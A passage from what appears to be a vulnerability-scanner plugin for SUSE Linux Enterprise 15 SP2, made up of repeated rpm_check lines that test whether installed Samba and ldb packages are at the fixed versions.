sp:\"2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-ceph-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"ldb-debugsource-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"ldb-tools-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"ldb-tools-debuginfo-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-binding0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-samr-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-samr0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-samr0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libldb-devel-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libldb2-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libldb2-debuginfo-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-krb5pac-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-krb5pac0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-nbt-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-nbt0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-standard-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-standard0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-standard0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libnetapi-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libnetapi0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libnetapi0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-credentials-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-credentials0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-errors-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-errors0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-hostconfig-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-hostconfig0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-passdb-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-passdb0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-policy-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-policy-python3-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-policy0-python3-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-policy0-python3-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-util-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-util0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-util0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamdb-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamdb0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamdb0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbclient-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbclient0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbclient0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbconf-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbconf0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbconf0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbldap-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbldap2-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbldap2-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libtevent-util-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libtevent-util0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libtevent-util0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libwbclient-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libwbclient0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libwbclient0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"python3-ldb-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"python3-ldb-debuginfo-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"python3-ldb-devel-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-ad-dc-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-ad-dc-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-client-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-client-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-core-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-debugsource-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-dsdb-modules-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-dsdb-modules-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-libs-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-libs-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-libs-python3-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-libs-python3-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-python3-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-python3-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-winbind-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-winbind-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libldb2-32bit-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libldb2-32bit-debuginfo-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-ceph-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"ldb-debugsource-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"ldb-tools-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"ldb-tools-debuginfo-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-binding0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-samr-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-samr0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-samr0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libldb-devel-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libldb2-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libldb2-debuginfo-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-krb5pac-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-krb5pac0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-nbt-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-nbt0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-standard-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-standard0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-standard0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libnetapi-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libnetapi0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libnetapi0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif 